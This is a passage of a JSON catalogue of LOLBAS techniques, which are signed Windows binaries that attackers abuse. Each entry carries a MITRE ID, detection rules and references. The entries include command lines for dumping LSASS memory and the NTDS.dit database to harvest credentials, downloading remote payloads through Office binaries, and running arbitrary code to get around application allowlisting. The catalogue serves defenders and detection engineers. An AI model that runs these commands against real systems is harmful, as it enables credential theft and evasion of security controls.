Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dotnet-exe:3","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"dotnet.exe msbuild {PATH:.csproj}","description":"dotnet.exe with msbuild (SDK Version) will execute unsigned code","usecase":"Execute code bypassing AWL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"]},{"id":"lolbas:dsdbutil-exe:0","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"quit\" \"quit\"","description":"dsdbutil supports VSS snapshot creation","usecase":"Snapshoting of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:1","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"mount {GUID}\" \"quit\" \"quit\"","description":"Mounting the snapshot with its GUID","usecase":"Mounting the snapshot to access the ntds.dit with `copy c:\\<Snap Volume>\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak`","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:2","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"delete {GUID}\" \"quit\" \"quit\"","description":"Deletes the mount of the snapshot","usecase":"Deletes the snapshot","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:3","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"list all\" \"mount 1\" \"quit\" \"quit\"","description":"Mounting with snapshot identifier","usecase":"Mounting the snapshot identifier 1 and accessing it with `copy c:\\<Snap Volume>\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak`","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dsdbutil-exe:4","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"list all\" \"delete 1\" \"quit\" \"quit\"","description":"Deletes the mount of the snapshot","usecase":"deletes the snapshot","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dtutil-exe:0","toolId":"lolbas:dtutil-exe","toolName":"dtutil.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext}","description":"Copy file from source to destination","usecase":"Use to copies the source file to the destination file","mitre":["T1105"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/sql/integration-services/dtutil-utility?view=sql-server-ver16","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dtutil/"]},{"id":"lolbas:dump64-exe:0","toolId":"lolbas:dump64-exe","toolName":"Dump64.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dump64.exe {PID} out.dmp","description":"Creates a memory dump of the LSASS process.","usecase":"Create memory dump and parse it offline to retrieve credentials.","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://twitter.com/mrd0x/status/1460597833917251595","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"]},{"id":"lolbas:dumpminitool-exe:0","toolId":"lolbas:dumpminitool-exe","toolName":"DumpMinitool.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full","description":"Creates a memory dump of the lsass process","usecase":"Create memory dump and parse it offline","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\\DumpMinitool.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"references":["https://twitter.com/mrd0x/status/1511415432888131586","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"]},{"id":"lolbas:dxcap-exe:0","toolId":"lolbas:dxcap-exe","toolName":"Dxcap.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Dxcap.exe -c {PATH_ABSOLUTE:.exe}","description":"Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add '-file c:\\path\\to\\writable\\location.ext' as first argument.","usecase":"Local execution of a process as a subprocess of dxcap.exe","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"},{"type":"IOC","value":"dxcap.exe executing from outside of System32/SysWOW64"},{"type":"IOC","value":"dxcap.exe spawning Xperf.exe"},{"type":"IOC","value":"Xperf.exe executing from unusual directories (if not running from ADK path)"}],"references":["https://twitter.com/harr0ey/status/992008180904419328","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"]},{"id":"lolbas:dxcap-exe:1","toolId":"lolbas:dxcap-exe","toolName":"Dxcap.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dxcap.exe -usage","description":"Once executed, `dxcap.exe` will execute `xperf.exe` in the same folder. Thus, if `dxcap.exe` is copied to a folder and an arbitrary executable is renamed to `xperf.exe`, `dxcap.exe` will spawn it.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"},{"type":"IOC","value":"dxcap.exe executing from outside of System32/SysWOW64"},{"type":"IOC","value":"dxcap.exe spawning Xperf.exe"},{"type":"IOC","value":"Xperf.exe executing from unusual directories (if not running from ADK path)"}],"references":["https://twitter.com/harr0ey/status/992008180904419328","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"]},{"id":"lolbas:ecmangen-exe:0","toolId":"lolbas:ecmangen-exe","toolName":"ECMangen.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ECMangen.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\ECMangen.exe","C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\x64\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\<version>\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Bin\\ECMangen.exe","C:\\ExchangeServer\\Bin\\ECMangen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a ECMangen command line"},{"type":"IOC","value":"ECMangen making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ECMangen/"]},{"id":"lolbas:excel-exe:0","toolId":"lolbas:excel-exe","toolName":"Excel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Excel.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"]},{"id":"lolbas:fsi-exe:0","toolId":"lolbas:fsi-exe","toolName":"Fsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsi.exe {PATH:.fsscript}","description":"Execute F# code via script file","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Fsi.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://twitter.com/NickTyrer/status/904273264385589248","https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"]},{"id":"lolbas:fsi-exe:1","toolId":"lolbas:fsi-exe","toolName":"Fsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsi.exe","description":"Execute F# code via interactive command line","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Fsi.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://twitter.com/NickTyrer/status/904273264385589248","https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"]},{"id":"lolbas:fsianycpu-exe:0","toolId":"lolbas:fsianycpu-exe","toolName":"FsiAnyCpu.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsianycpu.exe {PATH:.fsscript}","description":"Execute F# code via script file","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"FsiAnyCpu.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"]},{"id":"lolbas:fsianycpu-exe:1","toolId":"lolbas:fsianycpu-exe","toolName":"FsiAnyCpu.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsianycpu.exe","description":"Execute F# code via interactive command line","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"FsiAnyCpu.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"]},{"id":"lolbas:intellitrace-exe:0","toolId":"lolbas:intellitrace-exe","toolName":"IntelliTrace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"IntelliTrace.exe launch /cp:\"collectionplan.xml\" /f:\"c:\\users\\public\\log\" \"C:\\Windows\\System32\\calc.exe\"","description":"Launches an executable via Visual Studio command line utility.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/visualstudio/debugger/intellitrace","https://lolbas-project.github.io/lolbas/OtherMSBinaries/IntelliTrace/"]},{"id":"lolbas:logger-exe:0","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe RUN \"{CMD}\"","description":"Executes the command specified after the `RUN` parameter as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"]},{"id":"lolbas:logger-exe:1","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe RUNW \"{CMD}\"","description":"Executes the command specified after the `RUNW` parameter as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"]},{"id":"lolbas:logger-exe:2","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe \"{CMD}\"","description":"Executes the command specified as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"]},{"id":"lolbas:mftrace-exe:0","toolId":"lolbas:mftrace-exe","toolName":"Mftrace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Mftrace.exe {PATH:.exe}","description":"Launch specified executable as a subprocess of Mftrace.exe.","usecase":"Local execution of cmd.exe as a subprocess of Mftrace.exe.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mftrace.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml"}],"references":["https://twitter.com/0rbz_/status/988911181422186496","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"]},{"id":"lolbas:microsoft-nodejstools-pressanykey-exe:0","toolId":"lolbas:microsoft-nodejstools-pressanykey-exe","toolName":"Microsoft.NodejsTools.PressAnyKey.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}","description":"Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.","usecase":"Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml"}],"references":["https://twitter.com/mrd0x/status/1463526834918854661","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"]},{"id":"lolbas:mpiexec-exe:0","toolId":"lolbas:mpiexec-exe","toolName":"Mpiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mpiexec.exe {CMD}","description":"Executes a command via MPI command-line tool.","usecase":"Executes commands under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe","C:\\Program Files (x86)\\Microsoft MPI\\Bin\\mpiexec.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mpiexec/"]},{"id":"lolbas:msaccess-exe:0","toolId":"lolbas:msaccess-exe","toolName":"MSAccess.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MSAccess.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files 